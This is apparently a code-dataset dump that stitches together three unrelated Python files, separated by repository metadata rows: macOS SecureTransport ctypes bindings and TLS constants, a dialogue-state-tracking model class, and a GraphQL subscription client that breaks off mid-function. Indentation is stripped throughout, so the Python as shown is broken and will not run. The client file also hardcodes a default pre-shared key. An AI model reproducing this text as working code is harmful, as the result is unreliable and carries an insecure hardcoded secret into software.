CFAllocatorRef = c_void_p
OSStatus = c_int32
CFDataRef = POINTER(CFData)
CFStringRef = POINTER(CFString)
CFArrayRef = POINTER(CFArray)
CFMutableArrayRef = POINTER(CFMutableArray)
CFDictionaryRef = POINTER(CFDictionary)
CFArrayCallBacks = c_void_p
CFDictionaryKeyCallBacks = c_void_p
CFDictionaryValueCallBacks = c_void_p
SecCertificateRef = POINTER(c_void_p)
SecExternalFormat = c_uint32
SecExternalItemType = c_uint32
SecIdentityRef = POINTER(c_void_p)
SecItemImportExportFlags = c_uint32
SecItemImportExportKeyParameters = c_void_p
SecKeychainRef = POINTER(c_void_p)
SSLProtocol = c_uint32
SSLCipherSuite = c_uint32
SSLContextRef = POINTER(c_void_p)
SecTrustRef = POINTER(c_void_p)
SSLConnectionRef = c_uint32
SecTrustResultType = c_uint32
SecTrustOptionFlags = c_uint32
SSLProtocolSide = c_uint32
SSLConnectionType = c_uint32
SSLSessionOption = c_uint32
try:
Security.SecItemImport.argtypes = [
CFDataRef,
CFStringRef,
POINTER(SecExternalFormat),
POINTER(SecExternalItemType),
SecItemImportExportFlags,
POINTER(SecItemImportExportKeyParameters),
SecKeychainRef,
POINTER(CFArrayRef),
]
Security.SecItemImport.restype = OSStatus
Security.SecCertificateGetTypeID.argtypes = []
Security.SecCertificateGetTypeID.restype = CFTypeID
Security.SecIdentityGetTypeID.argtypes = []
Security.SecIdentityGetTypeID.restype = CFTypeID
Security.SecKeyGetTypeID.argtypes = []
Security.SecKeyGetTypeID.restype = CFTypeID
Security.SecCertificateCreateWithData.argtypes = [CFAllocatorRef, CFDataRef]
Security.SecCertificateCreateWithData.restype = SecCertificateRef
Security.SecCertificateCopyData.argtypes = [SecCertificateRef]
Security.SecCertificateCopyData.restype = CFDataRef
Security.SecCopyErrorMessageString.argtypes = [OSStatus, c_void_p]
Security.SecCopyErrorMessageString.restype = CFStringRef
Security.SecIdentityCreateWithCertificate.argtypes = [
CFTypeRef,
SecCertificateRef,
POINTER(SecIdentityRef),
]
Security.SecIdentityCreateWithCertificate.restype = OSStatus
Security.SecKeychainCreate.argtypes = [
c_char_p,
c_uint32,
c_void_p,
Boolean,
c_void_p,
POINTER(SecKeychainRef),
]
Security.SecKeychainCreate.restype = OSStatus
Security.SecKeychainDelete.argtypes = [SecKeychainRef]
Security.SecKeychainDelete.restype = OSStatus
Security.SecPKCS12Import.argtypes = [
CFDataRef,
CFDictionaryRef,
POINTER(CFArrayRef),
]
Security.SecPKCS12Import.restype = OSStatus
SSLReadFunc = CFUNCTYPE(OSStatus, SSLConnectionRef, c_void_p, POINTER(c_size_t))
SSLWriteFunc = CFUNCTYPE(
OSStatus, SSLConnectionRef, POINTER(c_byte), POINTER(c_size_t)
)
Security.SSLSetIOFuncs.argtypes = [SSLContextRef, SSLReadFunc, SSLWriteFunc]
Security.SSLSetIOFuncs.restype = OSStatus
Security.SSLSetPeerID.argtypes = [SSLContextRef, c_char_p, c_size_t]
Security.SSLSetPeerID.restype = OSStatus
Security.SSLSetCertificate.argtypes = [SSLContextRef, CFArrayRef]
Security.SSLSetCertificate.restype = OSStatus
Security.SSLSetCertificateAuthorities.argtypes = [SSLContextRef, CFTypeRef, Boolean]
Security.SSLSetCertificateAuthorities.restype = OSStatus
Security.SSLSetConnection.argtypes = [SSLContextRef, SSLConnectionRef]
Security.SSLSetConnection.restype = OSStatus
Security.SSLSetPeerDomainName.argtypes = [SSLContextRef, c_char_p, c_size_t]
Security.SSLSetPeerDomainName.restype = OSStatus
Security.SSLHandshake.argtypes = [SSLContextRef]
Security.SSLHandshake.restype = OSStatus
Security.SSLRead.argtypes = [SSLContextRef, c_char_p, c_size_t, POINTER(c_size_t)]
Security.SSLRead.restype = OSStatus
Security.SSLWrite.argtypes = [SSLContextRef, c_char_p, c_size_t, POINTER(c_size_t)]
Security.SSLWrite.restype = OSStatus
Security.SSLClose.argtypes = [SSLContextRef]
Security.SSLClose.restype = OSStatus
Security.SSLGetNumberSupportedCiphers.argtypes = [SSLContextRef, POINTER(c_size_t)]
Security.SSLGetNumberSupportedCiphers.restype = OSStatus
Security.SSLGetSupportedCiphers.argtypes = [
SSLContextRef,
POINTER(SSLCipherSuite),
POINTER(c_size_t),
]
Security.SSLGetSupportedCiphers.restype = OSStatus
Security.SSLSetEnabledCiphers.argtypes = [
SSLContextRef,
POINTER(SSLCipherSuite),
c_size_t,
]
Security.SSLSetEnabledCiphers.restype = OSStatus
Security.SSLGetNumberEnabledCiphers.argtype = [SSLContextRef, POINTER(c_size_t)]
Security.SSLGetNumberEnabledCiphers.restype = OSStatus
Security.SSLGetEnabledCiphers.argtypes = [
SSLContextRef,
POINTER(SSLCipherSuite),
POINTER(c_size_t),
]
Security.SSLGetEnabledCiphers.restype = OSStatus
Security.SSLGetNegotiatedCipher.argtypes = [SSLContextRef, POINTER(SSLCipherSuite)]
Security.SSLGetNegotiatedCipher.restype = OSStatus
Security.SSLGetNegotiatedProtocolVersion.argtypes = [
SSLContextRef,
POINTER(SSLProtocol),
]
Security.SSLGetNegotiatedProtocolVersion.restype = OSStatus
Security.SSLCopyPeerTrust.argtypes = [SSLContextRef, POINTER(SecTrustRef)]
Security.SSLCopyPeerTrust.restype = OSStatus
Security.SecTrustSetAnchorCertificates.argtypes = [SecTrustRef, CFArrayRef]
Security.SecTrustSetAnchorCertificates.restype = OSStatus
Security.SecTrustSetAnchorCertificatesOnly.argstypes = [SecTrustRef, Boolean]
Security.SecTrustSetAnchorCertificatesOnly.restype = OSStatus
Security.SecTrustEvaluate.argtypes = [SecTrustRef, POINTER(SecTrustResultType)]
Security.SecTrustEvaluate.restype = OSStatus
Security.SecTrustGetCertificateCount.argtypes = [SecTrustRef]
Security.SecTrustGetCertificateCount.restype = CFIndex
Security.SecTrustGetCertificateAtIndex.argtypes = [SecTrustRef, CFIndex]
Security.SecTrustGetCertificateAtIndex.restype = SecCertificateRef
Security.SSLCreateContext.argtypes = [
CFAllocatorRef,
SSLProtocolSide,
SSLConnectionType,
]
Security.SSLCreateContext.restype = SSLContextRef
Security.SSLSetSessionOption.argtypes = [SSLContextRef, SSLSessionOption, Boolean]
Security.SSLSetSessionOption.restype = OSStatus
Security.SSLSetProtocolVersionMin.argtypes = [SSLContextRef, SSLProtocol]
Security.SSLSetProtocolVersionMin.restype = OSStatus
Security.SSLSetProtocolVersionMax.argtypes = [SSLContextRef, SSLProtocol]
Security.SSLSetProtocolVersionMax.restype = OSStatus
try:
Security.SSLSetALPNProtocols.argtypes = [SSLContextRef, CFArrayRef]
Security.SSLSetALPNProtocols.restype = OSStatus
except AttributeError:
# Supported only in 10.12+
pass
Security.SecCopyErrorMessageString.argtypes = [OSStatus, c_void_p]
Security.SecCopyErrorMessageString.restype = CFStringRef
Security.SSLReadFunc = SSLReadFunc
Security.SSLWriteFunc = SSLWriteFunc
Security.SSLContextRef = SSLContextRef
Security.SSLProtocol = SSLProtocol
Security.SSLCipherSuite = SSLCipherSuite
Security.SecIdentityRef = SecIdentityRef
Security.SecKeychainRef = SecKeychainRef
Security.SecTrustRef = SecTrustRef
Security.SecTrustResultType = SecTrustResultType
Security.SecExternalFormat = SecExternalFormat
Security.OSStatus = OSStatus
Security.kSecImportExportPassphrase = CFStringRef.in_dll(
Security, "kSecImportExportPassphrase"
)
Security.kSecImportItemIdentity = CFStringRef.in_dll(
Security, "kSecImportItemIdentity"
)
# CoreFoundation time!
CoreFoundation.CFRetain.argtypes = [CFTypeRef]
CoreFoundation.CFRetain.restype = CFTypeRef
CoreFoundation.CFRelease.argtypes = [CFTypeRef]
CoreFoundation.CFRelease.restype = None
CoreFoundation.CFGetTypeID.argtypes = [CFTypeRef]
CoreFoundation.CFGetTypeID.restype = CFTypeID
CoreFoundation.CFStringCreateWithCString.argtypes = [
CFAllocatorRef,
c_char_p,
CFStringEncoding,
]
CoreFoundation.CFStringCreateWithCString.restype = CFStringRef
CoreFoundation.CFStringGetCStringPtr.argtypes = [CFStringRef, CFStringEncoding]
CoreFoundation.CFStringGetCStringPtr.restype = c_char_p
CoreFoundation.CFStringGetCString.argtypes = [
CFStringRef,
c_char_p,
CFIndex,
CFStringEncoding,
]
CoreFoundation.CFStringGetCString.restype = c_bool
CoreFoundation.CFDataCreate.argtypes = [CFAllocatorRef, c_char_p, CFIndex]
CoreFoundation.CFDataCreate.restype = CFDataRef
CoreFoundation.CFDataGetLength.argtypes = [CFDataRef]
CoreFoundation.CFDataGetLength.restype = CFIndex
CoreFoundation.CFDataGetBytePtr.argtypes = [CFDataRef]
CoreFoundation.CFDataGetBytePtr.restype = c_void_p
CoreFoundation.CFDictionaryCreate.argtypes = [
CFAllocatorRef,
POINTER(CFTypeRef),
POINTER(CFTypeRef),
CFIndex,
CFDictionaryKeyCallBacks,
CFDictionaryValueCallBacks,
]
CoreFoundation.CFDictionaryCreate.restype = CFDictionaryRef
CoreFoundation.CFDictionaryGetValue.argtypes = [CFDictionaryRef, CFTypeRef]
CoreFoundation.CFDictionaryGetValue.restype = CFTypeRef
CoreFoundation.CFArrayCreate.argtypes = [
CFAllocatorRef,
POINTER(CFTypeRef),
CFIndex,
CFArrayCallBacks,
]
CoreFoundation.CFArrayCreate.restype = CFArrayRef
CoreFoundation.CFArrayCreateMutable.argtypes = [
CFAllocatorRef,
CFIndex,
CFArrayCallBacks,
]
CoreFoundation.CFArrayCreateMutable.restype = CFMutableArrayRef
CoreFoundation.CFArrayAppendValue.argtypes = [CFMutableArrayRef, c_void_p]
CoreFoundation.CFArrayAppendValue.restype = None
CoreFoundation.CFArrayGetCount.argtypes = [CFArrayRef]
CoreFoundation.CFArrayGetCount.restype = CFIndex
CoreFoundation.CFArrayGetValueAtIndex.argtypes = [CFArrayRef, CFIndex]
CoreFoundation.CFArrayGetValueAtIndex.restype = c_void_p
CoreFoundation.kCFAllocatorDefault = CFAllocatorRef.in_dll(
CoreFoundation, "kCFAllocatorDefault"
)
CoreFoundation.kCFTypeArrayCallBacks = c_void_p.in_dll(
CoreFoundation, "kCFTypeArrayCallBacks"
)
CoreFoundation.kCFTypeDictionaryKeyCallBacks = c_void_p.in_dll(
CoreFoundation, "kCFTypeDictionaryKeyCallBacks"
)
CoreFoundation.kCFTypeDictionaryValueCallBacks = c_void_p.in_dll(
CoreFoundation, "kCFTypeDictionaryValueCallBacks"
)
CoreFoundation.CFTypeRef = CFTypeRef
CoreFoundation.CFArrayRef = CFArrayRef
CoreFoundation.CFStringRef = CFStringRef
CoreFoundation.CFDictionaryRef = CFDictionaryRef
except (AttributeError):
raise ImportError("Error initializing ctypes")
class CFConst(object):
"""
A class object that acts as essentially a namespace for CoreFoundation
constants.
"""
kCFStringEncodingUTF8 = CFStringEncoding(0x08000100)
class SecurityConst(object):
"""
A class object that acts as essentially a namespace for Security constants.
"""
kSSLSessionOptionBreakOnServerAuth = 0
kSSLProtocol2 = 1
kSSLProtocol3 = 2
kTLSProtocol1 = 4
kTLSProtocol11 = 7
kTLSProtocol12 = 8
# SecureTransport does not support TLS 1.3 even if there's a constant for it
kTLSProtocol13 = 10
kTLSProtocolMaxSupported = 999
kSSLClientSide = 1
kSSLStreamType = 0
kSecFormatPEMSequence = 10
kSecTrustResultInvalid = 0
kSecTrustResultProceed = 1
# This gap is present on purpose: this was kSecTrustResultConfirm, which
# is deprecated.
kSecTrustResultDeny = 3
kSecTrustResultUnspecified = 4
kSecTrustResultRecoverableTrustFailure = 5
kSecTrustResultFatalTrustFailure = 6
kSecTrustResultOtherError = 7
errSSLProtocol = -9800
errSSLWouldBlock = -9803
errSSLClosedGraceful = -9805
errSSLClosedNoNotify = -9816
errSSLClosedAbort = -9806
errSSLXCertChainInvalid = -9807
errSSLCrypto = -9809
errSSLInternal = -9810
errSSLCertExpired = -9814
errSSLCertNotYetValid = -9815
errSSLUnknownRootCert = -9812
errSSLNoRootCert = -9813
errSSLHostNameMismatch = -9843
errSSLPeerHandshakeFail = -9824
errSSLPeerUserCancelled = -9839
errSSLWeakPeerEphemeralDHKey = -9850
errSSLServerAuthCompleted = -9841
errSSLRecordOverflow = -9847
errSecVerifyFailed = -67808
errSecNoTrustSettings = -25263
errSecItemNotFound = -25300
errSecInvalidTrustSettings = -25262
# Cipher suites. We only pick the ones our default cipher string allows.
# Source: https://developer.apple.com/documentation/security/1550981-ssl_cipher_suite_values
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xC02C
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xC030
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xC02B
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xC02F
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA9
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA8
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 = 0x009F
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 = 0x009E
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 = 0xC024
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 = 0xC028
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xC00A
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xC014
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 = 0x006B
TLS_DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 = 0xC023
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 = 0xC027
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA = 0xC009
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA = 0xC013
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 = 0x0067
TLS_DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033
TLS_RSA_WITH_AES_256_GCM_SHA384 = 0x009D
TLS_RSA_WITH_AES_128_GCM_SHA256 = 0x009C
TLS_RSA_WITH_AES_256_CBC_SHA256 = 0x003D
TLS_RSA_WITH_AES_128_CBC_SHA256 = 0x003C
TLS_RSA_WITH_AES_256_CBC_SHA = 0x0035
TLS_RSA_WITH_AES_128_CBC_SHA = 0x002F
TLS_AES_128_GCM_SHA256 = 0x1301
TLS_AES_256_GCM_SHA384 = 0x1302
TLS_AES_128_CCM_8_SHA256 = 0x1305
TLS_AES_128_CCM_SHA256 = 0x1304
| 33.944231
| 96
| 0.755651
|
4a144bd3cfd00ed8062e5798c7cb7d05cc7c7891
| 5,349
|
py
|
Python
|
models/dst.py
|
henryhungle/UniConv
|
e2b9bc86d35e443cf476aadebc61917d254537b6
|
[
"MIT"
] | 6
|
2020-11-15T13:35:12.000Z
|
2022-01-30T10:03:40.000Z
|
models/dst.py
|
henryhungle/UniConv
|
e2b9bc86d35e443cf476aadebc61917d254537b6
|
[
"MIT"
] | null | null | null |
models/dst.py
|
henryhungle/UniConv
|
e2b9bc86d35e443cf476aadebc61917d254537b6
|
[
"MIT"
] | 1
|
2020-11-16T13:26:31.000Z
|
2020-11-16T13:26:31.000Z
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils.weight_norm import weight_norm
import math, copy, time
from torch.autograd import Variable
from collections import OrderedDict
import pdb
from models.modules import *
class DSTNet(nn.Module):
def __init__(self, in_embed,
layer_norm,
slot_dst,
domain_dst,
domain_slot_dst,
dst_generator,
args):
super(DSTNet, self).__init__()
self.in_embed=in_embed
self.layer_norm = layer_norm
self.slot_dst=slot_dst
self.domain_dst=domain_dst
self.domain_slot_dst=domain_slot_dst
self.dst_generator=dst_generator
self.args=args
def load_pretrained(self, pretrained_dst):
self.in_embed[0].load_pretrained(pretrained_dst.in_embed[0])
count = 0
for layer in self.layer_norm:
layer.load_pretrained(pretrained_dst.layer_norm[count])
count += 1
self.slot_dst.load_pretrained(pretrained_dst.slot_dst)
if self.domain_dst is not None: self.domain_dst.load_pretrained(pretrained_dst.domain_dst)
if self.domain_slot_dst is not None: self.domain_slot_dst.load_pretrained(pretrained_dst.domain_slot_dst)
self.dst_generator.load_pretrained(pretrained_dst.dst_generator)
def forward(self, batch, out):
out = self.encode(batch, out)
out = self.track_state(batch, out)
return out
def encode(self, batch, out):
count = 0
if self.args.domain_flow:
out['embedded_slots'] = self.layer_norm[count](self.in_embed[0](batch.in_slots))
count += 1
out['embedded_domains'] = self.layer_norm[count](self.in_embed[0](batch.in_domains))
count += 1
else:
out['embedded_slots'] = self.layer_norm[count](self.in_embed[0](batch.in_slots).sum(2))
count += 1
if self.args.add_prev_dial_state:
out['embedded_state'] = self.layer_norm[count](self.in_embed(batch.in_state))
count += 1
out['embedded_in_txt'] = self.layer_norm[count](self.in_embed(batch.in_txt))
count += 1
if self.args.detach_dial_his:
out['embedded_in_his'] = self.layer_norm[count](self.in_embed(batch.in_his))
count += 1
return out
def track_state(self, batch, out):
if not self.args.add_prev_dial_state and not self.args.detach_dial_his:
out['out_slots'] = self.slot_dst(out['embedded_slots'], None, out['embedded_in_txt'], batch.in_txt_mask)
elif not self.args.add_prev_dial_state:
out['out_slots'] = self.slot_dst(out['embedded_slots'], None, out['embedded_in_his'], batch.in_his_mask, out['embedded_in_txt'], batch.in_txt_mask)
elif not self.args.detach_dial_his:
out['out_slots'] = self.slot_dst(out['embedded_slots'], None, out['embedded_state'], batch.in_state_mask, out['embedded_in_txt'], batch.in_txt_mask)
else:
out['out_slots'] = self.slot_dst(out['embedded_slots'], None, out['embedded_in_his'], batch.in_his_mask, out['embedded_state'], batch.in_state_mask, out['embedded_in_txt'], batch.in_txt_mask)
if self.args.domain_flow:
if not self.args.detach_dial_his:
out['out_domains'] = self.domain_dst(out['embedded_domains'], None, out['embedded_in_txt'], batch.in_txt_mask)
else:
out['out_domains'] = self.domain_dst(out['embedded_domains'], None, out['embedded_in_his'], batch.in_his_mask, out['embedded_in_txt'], batch.in_txt_mask)
out_domains = out['out_domains'].unsqueeze(2)
out_slots = out['out_slots'].unsqueeze(1)
out_domains = out_domains.expand(out_domains.shape[0], out_domains.shape[1], out_slots.shape[2], out_domains.shape[3])
out_slots = out_slots.expand(out_slots.shape[0], out_domains.shape[1], out_slots.shape[2], out_slots.shape[3])
out['out_states'] = out_domains * out_slots
if self.args.domain_slot_dst:
out_states = out['out_states']
original_size = out_states.shape
out_states = out_states.view(out_states.shape[0], -1, out_states.shape[-1])
out_states = self.domain_slot_dst(out_states, batch.domain_slot_mask)
out['out_states'] = out_states.view(*original_size)
else:
out['out_states'] = out['out_slots']
return out
class DST(nn.Module):
def __init__(self, layer, N):
super(DST, self).__init__()
self.layers = clones(layer, N)
self.norm = LayerNorm(layer.size)
def load_pretrained(self, pretrained_dst):
count = 0
for layer in self.layers:
layer.load_pretrained(pretrained_dst.layers[count])
count += 1
self.norm.load_pretrained(pretrained_dst.norm)
def forward(self, states, states_mask, in_txt1=None, in_mask1=None,
in_txt2=None, in_mask2=None, in_txt3=None, in_mask3=None):
for layer in self.layers:
states = layer(states, states_mask, in_txt1, in_mask1, in_txt2, in_mask2, in_txt3, in_mask3)
return self.norm(states)
| 46.112069
| 203
| 0.646476
|
4a144bf85b021a5081ba9d92c0b05d5412ec74b5
| 40,302
|
py
|
Python
|
ecube/gql.py
|
epiphani-inc/ecube
|
b4f42afa2ac6bc797a30d36a336b0a6807eac757
|
[
"MIT"
] | 2
|
2020-09-26T01:24:17.000Z
|
2020-09-27T18:56:16.000Z
|
ecube/gql.py
|
epiphani-inc/ecube
|
b4f42afa2ac6bc797a30d36a336b0a6807eac757
|
[
"MIT"
] | 26
|
2020-08-19T15:50:02.000Z
|
2020-08-19T15:50:17.000Z
|
ecube/gql.py
|
epiphani-inc/ecube
|
b4f42afa2ac6bc797a30d36a336b0a6807eac757
|
[
"MIT"
] | null | null | null |
'''
Copyright (c) 2020 epiphani, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from __future__ import print_function
import sys
import appsync_subscription_manager as asm
import warrant
import os
from datetime import datetime
import threading
import pprint
import ecube.environments as environments
import time
import requests
import hashlib
import json
import traceback
import signal
import ecube.gql_operations.Mutations as Mutations
import ecube.gql_operations.Queries as Queries
import ecube.gql_operations.Localops as Localops
import base64
import codecs
import six
import re
from future.utils import iteritems
import copy
ENVIRONMENTS = environments.ENVIRONMENTS
ARTIBOT_USERNAME = "artibot"
# Read GQL URL
LOCAL_GQL_HOST = os.environ.get('LOCAL_GQL_HOST', "localhost")
LOCAL_GQL_PORT = os.environ.get('LOCAL_GQL_PORT', "31050")
LOCAL_GQL_FRAG = "%s:%s" % (LOCAL_GQL_HOST, LOCAL_GQL_PORT)
GQL_PSK = os.environ.get("GQL_PSK", 'SAANPD00D')
LOG_DIR = "/var/log/epiphani/"
# AppMgr dictionary access lock
APPMGR_LOCK = threading.Lock()
# Subscriptions retry logic
APPSYNC_SUB_RETRY_MAP = {}
MAX_BACKOFF_TIME = 10
class WorkerPool():
def apply_async(self, t_func, t_args):
threading.Thread(target=t_func, args=t_args).start()
class GetObjError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(GetObjError, self).__init__(*args, **kwargs)
class ListObjectsError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(ListObjectsError, self).__init__(*args, **kwargs)
class DeleteObjectError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(DeleteObjectError, self).__init__(*args, **kwargs)
class InsertObjectError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(InsertObjectError, self).__init__(*args, **kwargs)
class UpdateObjectError(Exception):
def __init__(self, *args, **kwargs):
default_message = 'This is a default message!'
# if no arguments are passed set the first positional argument
# to be the default message. To do that, we have to replace the
# 'args' tuple with another one, that will only contain the message.
# (we cannot do an assignment since tuples are immutable)
if not (args or kwargs): args = (default_message,)
# Call super constructor
super(UpdateObjectError, self).__init__(*args, **kwargs)
class Logger():
DEBUG = 1
INFO = 2
ERROR = 3
OFF = 4
def __init__(self, log_to_file=True, log_file=None):
self.my_pid = os.getpid()
self.log_to_file = log_to_file
self.log_file = log_file
if log_file == None:
log_file = LOG_DIR + "ExecRunbook.%d.log" % (self.my_pid)
#print("Initializing logger for PID: %d" % (self.my_pid))
if self.log_to_file:
if log_file == None:
os.mkdir(LOG_DIR)
self.log_file = open(log_file, "w")
self.log_level = Logger.OFF
self.write = self.log_file.write
self.flush = self.log_file.flush
self.stream = self.log_file
else:
self.write = sys.stdout.write
self.flush = sys.stdout.flush
self.stream = sys.stdout
def is_valid_log_level(self, log_level):
l = False
try:
if not ((log_level < Logger.DEBUG) or (log_level > Logger.OFF)):
l = True
except:
pass
return l
def set_log_level(self, log_level):
if not self.is_valid_log_level(log_level):
print("ERROR: Trying to set Invalid log level: %r" % (log_level))
sys.exit(-1)
self.log_level = log_level
def get_log_level(self):
return self.log_level
def get_log_level_str(self, log_level):
if log_level == Logger.OFF:
return "OFF"
elif log_level == Logger.DEBUG:
return "DEBUG"
elif log_level == Logger.INFO:
return "INFO"
elif log_level == Logger.ERROR:
return "ERROR"
else:
return "INVALID_LOG_LEVEL(%s)" % (str(log_level))
def log(self, log_level, log_str):
if self.is_valid_log_level(log_level):
if log_level >= self.log_level:
self.write("%s: %d: %s: %r\n" % (datetime.now().strftime("%m/%d/%Y, %H:%M:%S"), self.my_pid, self.get_log_level_str(log_level), log_str))
else:
self.write("%s: %d: %s: %r\n" % (datetime.now().strftime("%m/%d/%Y, %H:%M:%S"), self.my_pid, self.get_log_level_str(log_level), log_str))
self.flush()
def pprint(self, log_level, log_obj):
if self.is_valid_log_level(log_level):
if log_level >= self.log_level:
pprint.pprint(log_obj, stream=self.stream)
self.write("\n")
else:
self.write("%d: %r\n" % (self.my_pid, self.get_log_level_str(log_level)))
pprint.pprint(log_obj, stream=self.stream)
self.write("\n")
self.flush()
def set_gql_psk(gql_psk):
global GQL_PSK
GQL_PSK = gql_psk
asm.set_gql_psk(gql_psk)
def set_local_gql_host(lgh):
global LOCAL_GQL_HOST
global LOCAL_GQL_FRAG
LOCAL_GQL_HOST = lgh
LOCAL_GQL_FRAG = "%s:%s" % (LOCAL_GQL_HOST, LOCAL_GQL_PORT)
asm.set_local_gql_frag(LOCAL_GQL_FRAG)
def set_local_gql_port(lgp):
global LOCAL_GQL_PORT
global LOCAL_GQL_FRAG
LOCAL_GQL_PORT = lgp
LOCAL_GQL_FRAG = "%s:%s" % (LOCAL_GQL_HOST, LOCAL_GQL_PORT)
asm.set_local_gql_frag(LOCAL_GQL_FRAG)
def init_local_env(username):
return {
'endpoint': "http://%s:%s/graphql" % (LOCAL_GQL_HOST, LOCAL_GQL_PORT),
'id_token': None,
'username': username,
'current_env': None,
}
# calculate and return the md5sum of the contents of a given file
def get_file_md5sum(file_name):
with open(file_name, "rb") as f:
file_hash = hashlib.md5()
t = f.read(8192)
while t:
file_hash.update(t)
t = f.read(8192)
return file_hash.hexdigest()
def initEnv(current_env, logger):
users = get_env_var(current_env, 'USERS')
gql_endpoint = get_env_var(current_env, "GRAPHQL_API_ENDPOINT")
user_list = []
user_dict = {}
username_dict = {}
# Initialize the environment
init_environment(current_env, users, user_list, user_dict, username_dict, logger)
myauth = users[0]['auth']
ret = {
'id_token': myauth.id_token,
'username': myauth.username,
'current_env': current_env,
'endpoint': gql_endpoint
}
return ret
def setup_env_and_subscribe(sub_list=None, appsync_sub_mgrs_map=None, logger=None,
on_connection_error=None, on_error=None, on_sub_error=None,
on_close=None, current_env=None, on_subscription_success=None,
use_local_instance=False):
tmp_dict = {}
user_list = []
user_dict = {}
username_dict = {}
# Setup vars for the environment
if not use_local_instance:
users = get_env_var(current_env, 'USERS')
gql_endpoint = get_env_var(current_env, "GRAPHQL_API_ENDPOINT")
# Initialize the environment
init_environment(current_env, users, user_list, user_dict, username_dict, logger)
for tmp_user in users:
tmp_dict[tmp_user['username']] = tmp_user['auth'].id_token
username = users[0]['username']
id_token = users[0]['auth'].id_token
else:
users = []
gql_endpoint = "http://" + LOCAL_GQL_FRAG + "/graphql"
username = "admin"
id_token="NOT_ID_TOKEN_NEEDED"
asm.set_local_gql_frag(LOCAL_GQL_FRAG)
asm.set_gql_psk(GQL_PSK)
check_and_subscribe(endpoint=gql_endpoint, endpoint_user_dict=tmp_dict,
username=username, id_token=id_token, use_local_instance=use_local_instance,
sub_list=sub_list, appsync_sub_mgrs_map=appsync_sub_mgrs_map, logger=logger,
on_connection_error=on_connection_error, on_error=on_error, on_sub_error=on_sub_error,
on_close=on_close, current_env=current_env, on_subscription_success=on_subscription_success)
def cf_on_close(cb_data):
# Remove the current subscription manager and create
# a new one
ep = cb_data['endpoint']
logger = cb_data['kwargs']['logger']
kwargs = cb_data['kwargs']
logger.log(Logger.ERROR, "CF: Got Socket close for EP: %s" % (ep))
logger.log(Logger.INFO, "CF: Calling APP Socket 'on-close'")
kwargs['on_close'](cb_data)
logger.log(Logger.INFO, "CF: Cleaning up EP: %s" % (ep))
first_retry = False
APPMGR_LOCK.acquire()
kwargs['appsync_sub_mgrs_map'].pop(ep, None)
retry_map = APPSYNC_SUB_RETRY_MAP.get(ep)
if not retry_map:
first_retry = True
retry_map = {'prev_ts': datetime.now(), 'backoff_time': 1}
APPSYNC_SUB_RETRY_MAP[ep] = retry_map
APPMGR_LOCK.release()
if not first_retry and retry_map['backoff_time'] < MAX_BACKOFF_TIME:
time_diff = int((datetime.now() - retry_map['prev_ts']).total_seconds())
if time_diff < retry_map['backoff_time']:
retry_map['backoff_time'] *= 2
elif time_diff > (MAX_BACKOFF_TIME * 10):
# If the last disconnect was more than 10 max backoff ago,
# then reset the backoff to default 1 second.
retry_map['backoff_time'] = 1
if retry_map['backoff_time'] > MAX_BACKOFF_TIME:
retry_map['backoff_time'] = MAX_BACKOFF_TIME
logger.log(Logger.INFO, "CF: Sleeping for %d seconds before retrying" % (retry_map['backoff_time']))
